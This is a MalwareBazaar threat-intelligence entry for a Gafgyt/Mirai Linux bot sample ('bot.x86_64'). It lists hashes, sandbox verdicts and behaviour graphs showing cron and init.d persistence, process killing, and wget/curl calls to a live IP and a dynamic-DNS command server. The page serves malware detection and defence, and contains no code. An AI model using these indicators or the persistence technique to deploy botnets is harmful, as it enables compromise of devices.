MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Gafgyt


Vendor detections: 8


Intelligence 8 IOCs YARA 4 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680
SHA3-384 hash: b9cc3c809eebafe7c6442437096aeac888c8e0af77a9ba82aceefafe80fe7df76c60e506046a0095ef54eb6278c3ebee
SHA1 hash: 3163f6ec23ac1ca0d67d27804220d498228e71da
MD5 hash: 17f8567b0bcc8365a6df920a8a83c335
humanhash: two-one-winter-south
File name:bot.x86_64
Download: download sample
Signature Gafgyt
Create hunting rule
File size:75'080 bytes
First seen:2026-05-13 19:18:12 UTC
Last seen:2026-05-14 05:20:47 UTC
File type: elf
MIME type:application/x-executable
ssdeep 1536:HXPErNu/a6D5cr7xsDeD9kgJBtBuDerEgbQ7zTVEYyxSAb/K23na6VhNp3KIDZI/:HXUk/9CJsDeOgrGD1VQfyS7+
TLSH T1AC734902F9E250BCC446D071475FAB26EB71B84843257BDF67C87AB13E66E902F5A360
telfhash t1a311e104c2d819ac2bfe59b3a6847e4b98b310d610d97dda636cd7060c54fd33b08132
Magika elf
Reporter abuse_ch
Tags:elf gafgyt

Intelligence

File Origin
# of uploads :
2
# of downloads :
47
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
SecuriteInfo.com.Linux.DDoS.2637.3468.18755.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Launching a process
Runs as daemon
Opens a port
Creating a file
Receives data from a server
Sets a written file as executable
Creating a file in the %temp% directory
Changes the time when the file was created, accessed, or modified
Changes access rights for a written file
Sends data to a server
Creating a process from a recently created file
Connection attempt
Manages services
Creates or modifies files in /cron to set up autorun
Substitutes an application name
Creates or modifies symbolic links in /init.d to set up autorun
Creates or modifies files in /init.d to set up autorun
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/6a04ce79792fe2d217b2360b/reports/db15f988-449b-4440-bfa1-054c98476a97/overview
Verdict:
Malicious
Uses P2P?:
false
Uses anti-vm?:
false
Architecture:
x86
Packer:
not packed
Botnet:
unknown
Number of open files:
148
Number of processes launched:
68
Processes remaning?
true
Remote TCP ports scanned:
not identified
Full report:
https://elfdigest.com/brief/b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680
Behaviour
Persistence
Process Renaming
Botnet C2s
TCP botnet C2(s):
not identified
UDP botnet C2(s):
not identified
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/a8cee5a6-c71e-4dae-8d67-21aec4ba6fb1
Behavior Graph:
Download SVG
%3 guuid=8282591b-1800-0000-a61b-d047650c0000 pid=3173 /usr/bin/sudo guuid=fcd1301e-1800-0000-a61b-d047660c0000 pid=3174 /tmp/sample.bin net guuid=8282591b-1800-0000-a61b-d047650c0000 pid=3173->guuid=fcd1301e-1800-0000-a61b-d047660c0000 pid=3174 execve ea35cd3e-9656-57ca-bdd7-f604f694dd89 127.0.0.1:20123 guuid=fcd1301e-1800-0000-a61b-d047660c0000 pid=3174->ea35cd3e-9656-57ca-bdd7-f604f694dd89 con guuid=31b9651e-1800-0000-a61b-d047670c0000 pid=3175 /tmp/sample.bin guuid=fcd1301e-1800-0000-a61b-d047660c0000 pid=3174->guuid=31b9651e-1800-0000-a61b-d047670c0000 pid=3175 clone guuid=cd54d41e-1800-0000-a61b-d047680c0000 pid=3176 /tmp/sample.bin zombie guuid=fcd1301e-1800-0000-a61b-d047660c0000 pid=3174->guuid=cd54d41e-1800-0000-a61b-d047680c0000 pid=3176 clone guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177 /tmp/sample.bin write-config zombie guuid=cd54d41e-1800-0000-a61b-d047680c0000 pid=3176->guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177 clone guuid=04e1fd1e-1800-0000-a61b-d0476a0c0000 pid=3178 /usr/bin/dash guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177->guuid=04e1fd1e-1800-0000-a61b-d0476a0c0000 pid=3178 execve guuid=f1726259-1800-0000-a61b-d047c90c0000 pid=3273 /usr/bin/dash guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177->guuid=f1726259-1800-0000-a61b-d047c90c0000 pid=3273 execve guuid=1d05a459-1800-0000-a61b-d047ca0c0000 pid=3274 /usr/bin/dash guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177->guuid=1d05a459-1800-0000-a61b-d047ca0c0000 pid=3274 execve guuid=b6df7e8d-1800-0000-a61b-d047200d0000 pid=3360 /usr/bin/dash guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177->guuid=b6df7e8d-1800-0000-a61b-d047200d0000 pid=3360 execve guuid=5da2be05-1900-0000-a61b-d0476f0e0000 pid=3695 /usr/bin/dash guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177->guuid=5da2be05-1900-0000-a61b-d0476f0e0000 pid=3695 execve guuid=09e55f06-1900-0000-a61b-d047760e0000 pid=3702 /usr/bin/dash guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177->guuid=09e55f06-1900-0000-a61b-d047760e0000 pid=3702 execve guuid=696ded06-1900-0000-a61b-d0477d0e0000 pid=3709 /usr/bin/dash guuid=3396e01e-1800-0000-a61b-d047690c0000 pid=3177->guuid=696ded06-1900-0000-a61b-d0477d0e0000 pid=3709 execve guuid=edc37c1f-1800-0000-a61b-d0476b0c0000 pid=3179 /usr/sbin/update-rc.d guuid=04e1fd1e-1800-0000-a61b-d0476a0c0000 pid=3178->guuid=edc37c1f-1800-0000-a61b-d0476b0c0000 pid=3179 execve guuid=ac918f24-1800-0000-a61b-d0476d0c0000 pid=3181 /usr/bin/systemctl guuid=edc37c1f-1800-0000-a61b-d0476b0c0000 pid=3179->guuid=ac918f24-1800-0000-a61b-d0476d0c0000 pid=3181 execve guuid=28b2e259-1800-0000-a61b-d047cb0c0000 pid=3275 /usr/bin/systemctl guuid=1d05a459-1800-0000-a61b-d047ca0c0000 pid=3274->guuid=28b2e259-1800-0000-a61b-d047cb0c0000 pid=3275 execve guuid=c119b88d-1800-0000-a61b-d047210d0000 pid=3361 /usr/bin/systemctl guuid=b6df7e8d-1800-0000-a61b-d047200d0000 pid=3360->guuid=c119b88d-1800-0000-a61b-d047210d0000 pid=3361 execve guuid=7fdd808e-1800-0000-a61b-d047260d0000 pid=3366 /usr/lib/systemd/systemd-sysv-install guuid=c119b88d-1800-0000-a61b-d047210d0000 pid=3361->guuid=7fdd808e-1800-0000-a61b-d047260d0000 pid=3366 execve guuid=ba5f1293-1800-0000-a61b-d0472a0d0000 pid=3370 /usr/bin/getopt guuid=7fdd808e-1800-0000-a61b-d047260d0000 pid=3366->guuid=ba5f1293-1800-0000-a61b-d0472a0d0000 pid=3370 execve guuid=f71b5a93-1800-0000-a61b-d0472b0d0000 pid=3371 /usr/sbin/update-rc.d guuid=7fdd808e-1800-0000-a61b-d047260d0000 pid=3366->guuid=f71b5a93-1800-0000-a61b-d0472b0d0000 pid=3371 execve guuid=7d0379c5-1800-0000-a61b-d0478f0d0000 pid=3471 /usr/sbin/update-rc.d guuid=7fdd808e-1800-0000-a61b-d047260d0000 pid=3366->guuid=7d0379c5-1800-0000-a61b-d0478f0d0000 pid=3471 execve guuid=f24ff494-1800-0000-a61b-d047300d0000 pid=3376 /usr/bin/systemctl guuid=f71b5a93-1800-0000-a61b-d0472b0d0000 pid=3371->guuid=f24ff494-1800-0000-a61b-d047300d0000 pid=3376 execve guuid=8353a5c6-1800-0000-a61b-d047950d0000 pid=3477 /usr/bin/systemctl guuid=7d0379c5-1800-0000-a61b-d0478f0d0000 pid=3471->guuid=8353a5c6-1800-0000-a61b-d047950d0000 pid=3477 execve guuid=acd6e305-1900-0000-a61b-d047700e0000 pid=3696 /usr/bin/dash guuid=5da2be05-1900-0000-a61b-d0476f0e0000 pid=3695->guuid=acd6e305-1900-0000-a61b-d047700e0000 pid=3696 clone guuid=c224eb05-1900-0000-a61b-d047710e0000 pid=3697 /usr/bin/dash guuid=5da2be05-1900-0000-a61b-d0476f0e0000 pid=3695->guuid=c224eb05-1900-0000-a61b-d047710e0000 pid=3697 clone guuid=c7c1ee05-1900-0000-a61b-d047720e0000 pid=3698 /usr/bin/dash guuid=acd6e305-1900-0000-a61b-d047700e0000 pid=3696->guuid=c7c1ee05-1900-0000-a61b-d047720e0000 pid=3698 clone guuid=ddd5f205-1900-0000-a61b-d047730e0000 pid=3699 /usr/bin/grep guuid=acd6e305-1900-0000-a61b-d047700e0000 pid=3696->guuid=ddd5f205-1900-0000-a61b-d047730e0000 pid=3699 execve guuid=0d258706-1900-0000-a61b-d047780e0000 pid=3704 /usr/bin/dash guuid=09e55f06-1900-0000-a61b-d047760e0000 pid=3702->guuid=0d258706-1900-0000-a61b-d047780e0000 pid=3704 clone guuid=0a6a8b06-1900-0000-a61b-d047790e0000 pid=3705 /usr/bin/dash guuid=09e55f06-1900-0000-a61b-d047760e0000 pid=3702->guuid=0a6a8b06-1900-0000-a61b-d047790e0000 pid=3705 clone guuid=8b409306-1900-0000-a61b-d0477a0e0000 pid=3706 /usr/bin/dash guuid=0d258706-1900-0000-a61b-d047780e0000 pid=3704->guuid=8b409306-1900-0000-a61b-d0477a0e0000 pid=3706 clone guuid=de329706-1900-0000-a61b-d0477b0e0000 pid=3707 /usr/bin/grep guuid=0d258706-1900-0000-a61b-d047780e0000 pid=3704->guuid=de329706-1900-0000-a61b-d0477b0e0000 pid=3707 execve guuid=4e071507-1900-0000-a61b-d0477f0e0000 pid=3711 /etc/init.d/system048 guuid=696ded06-1900-0000-a61b-d0477d0e0000 pid=3709->guuid=4e071507-1900-0000-a61b-d0477f0e0000 pid=3711 execve guuid=ca943d07-1900-0000-a61b-d047800e0000 pid=3712 /usr/bin/wget net send-data write-file guuid=4e071507-1900-0000-a61b-d0477f0e0000 pid=3711->guuid=ca943d07-1900-0000-a61b-d047800e0000 pid=3712 execve guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3723 /usr/bin/curl net send-data write-file guuid=4e071507-1900-0000-a61b-d0477f0e0000 pid=3711->guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3723 execve a318185b-039b-5e42-bab5-947d8a30ffd4 176.65.139.177:80 guuid=ca943d07-1900-0000-a61b-d047800e0000 pid=3712->a318185b-039b-5e42-bab5-947d8a30ffd4 send: 136B guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3723->a318185b-039b-5e42-bab5-947d8a30ffd4 send: 85B 392ab4a6-5edd-5832-ae3e-8cd47c39e185 load.sh:80 guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3723->392ab4a6-5edd-5832-ae3e-8cd47c39e185 con guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3736 /usr/bin/curl dns net send-data guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3723->guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3736 clone guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3736->392ab4a6-5edd-5832-ae3e-8cd47c39e185 con 4f6baed0-9587-596c-82b3-fd721afe4cc1 10.0.2.3:53 guuid=b6e03e0a-1900-0000-a61b-d0478b0e0000 pid=3736->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 50B
Verdict:
Unknown
Link:
https://analyze.intezer.com/analyses/95d07962-f4aa-4c51-b36a-704b3dbc9d0b
Result
Threat name:
Mirai, Gafgyt
Create hunting rule
Detection:
malicious
Classification:
spre.troj.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1913129
Signature
Antivirus detection for dropped file
Connects to many ports of the same IP (likely port scanning)
Detected Mirai
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill a massive number of system processes
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Suricata IDS alerts for network traffic
Uses dynamic DNS services
Yara detected Gafgyt
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1913129 Sample: bot.x86_64.elf Startdate: 13/05/2026 Architecture: LINUX Score: 100 154 faggotcnc.duckdns.org 2->154 156 203.26.249.183, 10001, 23, 2323 CEOSYD-AS-APCatholicEducationOfficeSydneyAU Australia 2->156 158 11 other IPs or domains 2->158 160 Suricata IDS alerts for network traffic 2->160 162 Found malware configuration 2->162 164 Malicious sample detected (through community Yara rule) 2->164 168 5 other signatures 2->168 15 bot.x86_64.elf 2->15         started        17 systemd sh 2->17         started        19 systemd sh 2->19         started        21 30 other processes 2->21 signatures3 166 Uses dynamic DNS services 154->166 process4 process5 23 bot.x86_64.elf 15->23         started        25 bot.x86_64.elf 15->25         started        27 sh sh 17->27         started        29 sh wget 17->29         started        31 sh curl 17->31         started        33 sh chmod 17->33         started        35 sh chmod 19->35         started        37 3 other processes 19->37 39 4 other processes 21->39 process6 41 bot.x86_64.elf 23->41         started        44 sh wget 27->44         started        signatures7 170 Sample tries to kill a massive number of system processes 41->170 172 Sample tries to kill multiple processes (SIGKILL) 41->172 174 Sample tries to set files in /etc globally writable 41->174 176 3 other signatures 41->176 46 bot.x86_64.elf sh 41->46         started        48 bot.x86_64.elf sh 41->48         started        50 bot.x86_64.elf sh 41->50         started        52 5 other processes 41->52 process8 process9 54 sh system048 46->54         started        56 sh crontab 48->56         started        60 sh 48->60         started        62 sh crontab 50->62         started        64 sh 50->64         started        66 sh update-rc.d 52->66         started        68 sh systemctl 52->68         started        70 sh systemctl 52->70         started        72 sh systemctl 52->72         started        file10 74 system048 sh 54->74         started        76 system048 wget 54->76         started        91 2 other processes 54->91 138 /var/spool/cron/crontabs/tmp.143x9I, ASCII 56->138 dropped 178 Sample tries to persist itself using cron 56->178 180 Executes the "crontab" command typically for achieving persistence 56->180 78 sh crontab 60->78         started        81 sh grep 60->81         started        140 /var/spool/cron/crontabs/tmp.FqKJE3, ASCII 62->140 dropped 83 sh crontab 64->83         started        85 sh grep 64->85         started        182 Sample tries to persist itself using System V runlevels 66->182 87 update-rc.d systemctl 66->87         started        89 systemctl systemd-sysv-install 68->89         started        signatures11 process12 signatures13 93 sh bot.powerpc 74->93         started        95 sh bot.mipsr 74->95         started        97 sh bot.mips 74->97         started        105 39 other processes 74->105 184 Executes the "crontab" command typically for achieving persistence 78->184 99 systemd-sysv-install update-rc.d 89->99         started        101 systemd-sysv-install update-rc.d 89->101         started        103 systemd-sysv-install getopt 89->103         started        process14 file15 108 bot.powerpc 93->108         started        110 bot.powerpc 93->110         started        112 bot.mipsr 95->112         started        114 bot.mipsr 95->114         started        116 bot.mips 97->116         started        118 bot.mips 97->118         started        120 update-rc.d systemctl 99->120         started        122 update-rc.d systemctl 101->122         started        142 /tmp/bot.x86_64, ELF 105->142 dropped 144 /tmp/bot.sh4, ELF 105->144 dropped 146 /tmp/bot.powerpc, ELF 105->146 dropped 148 11 other malicious files 105->148 dropped 124 2 other processes 105->124 process16 process17 126 bot.powerpc 108->126         started        130 bot.mipsr 112->130         started        132 bot.mips 116->132         started        134 bot.m68k 124->134         started        file18 150 /etc/rc.local, ASCII 126->150 dropped 152 /etc/init.d/system048, POSIX 126->152 dropped 186 Sample tries to kill a massive number of system processes 126->186 188 Sample tries to kill multiple processes (SIGKILL) 126->188 190 Sample tries to set files in /etc globally writable 126->190 192 Drops files in suspicious directories 130->192 194 Sample deletes itself 130->194 196 Sample tries to persist itself using System V runlevels 130->196 136 bot.m68k sh 134->136         started        signatures19 process20
Score:
100%
Verdict:
Malware
File Type:
ELF
Link:
https://malprob.io/report/b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680/
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=wm5sol7d4aawnn5g53gcn37yu3n2lp3u4ilthbaja6bd4qj2q2aa._file
Result
Malware family:
n/a
Score:
  7/10
Tags:
credential_access defense_evasion discovery execution linux persistence privilege_escalation
Link:
https://tria.ge/reports/260513-x1l34aes9y/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Reads process memory
Creates/modifies Cron job
Enumerates running processes
Modifies init.d
Modifies rc script
Modifies systemd
File and Directory Permissions Modification
Deletes itself
Executes dropped EXE
Unexpected DNS network traffic destination
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
0.90
Link:
https://yomi.yoroi.company/submissions/b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ELF_IoT_Persistence_Hunt
Create hunting rule
Author:4r4
Description:Hunts for ELF files with persistence and download capabilities
Rule name:linux_generic_ipv6_catcher
Create hunting rule
Author:@_lubiedo
Description:ELF samples using IPv6 addresses
Rule name:TH_Generic_MassHunt_Linux_Malware_2026_CYFARE
Create hunting rule
Author:CYFARE
Description:Generic Linux malware mass-hunt rule - 2026
Reference:https://cyfare.net/
Rule name:unixredflags3
Create hunting rule
Author:Tim Brown @timb_machine
Description:Hunts for UNIX red flags

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Gafgyt

elf b33b272fe3e00166b7a6eecc26eff8a6dba5bf74e21733840907823e413a8680

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3844820/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3846351/

Comments